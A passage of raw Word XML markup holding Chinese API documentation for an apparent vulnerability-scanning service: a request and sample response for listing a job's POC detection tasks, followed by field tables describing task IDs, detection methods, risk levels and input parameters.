            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F84FAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D27D8CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607CDAD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E35A52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0CBFD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CB4C71A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4704BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/tasks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"4d6d38c4b39831f3c74e","jobType":1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DADC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774FE947" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "1756c4dc8f66365e3cb6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042018000053",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "params": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "permitExecuteTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "timlong's test notice22",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverityTip": "timlong's poc脚本风险描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverity": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "updateTime": 1545184060,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "inputSchemas": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "field": "qq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "displayName": "请求",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "caption": "wqw",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "required": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "defaultValue": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB54805"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2124"/>
        <w:gridCol w:w="2085"/>
        <w:gridCol w:w="1924"/>
        <w:gridCol w:w="3949"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="62BAE9D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898D223" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C27F41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5598A1E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B86F03B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22EBB625" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A8BD5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F75425E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30800915" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE94AEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>task id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F8CC53E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B779B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C44361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5859D666" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0982F20E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63769263" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5677EAA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517146A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map&lt;String,Object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B073E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695B025D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B1112FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56DAC052" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2110FA42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="235D821B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55550E43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5949DB9F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1911FD94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6239DACC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608BC19D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>BoInteger数组olean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C8F8763" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>允许的检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59260A0F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017B49F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D05A98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61307453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AEB8A51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测项名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FC8E06F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="235CC9FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39BD3E35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C084E8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BA1BC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测项类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="739044FC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3856EA2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverityTip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796290BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5557C567" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233CEE57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测脚本执行风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69229778" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B37F65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012B054F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A776357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012AFC6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测脚本执行风险，0：无风险，1：低风险，2：中风险，3：高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1FB50B68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F19C76F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B04E7C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163BCFD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA09D09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61F49380" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F8363E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9C8DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FDA46D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B99AFA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数定义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ECB7CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回rows中inputSchemas部分说明</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="40B271E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F7AD741" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A0D3B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E72464" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586BF568" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="071F6D9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C8333D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="536264DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C3FA28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796086C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BF0984B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBD0603" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>displayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D9C8318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785E2008" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFFDDE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数中文名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D8C5F89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080F69FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5261C263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
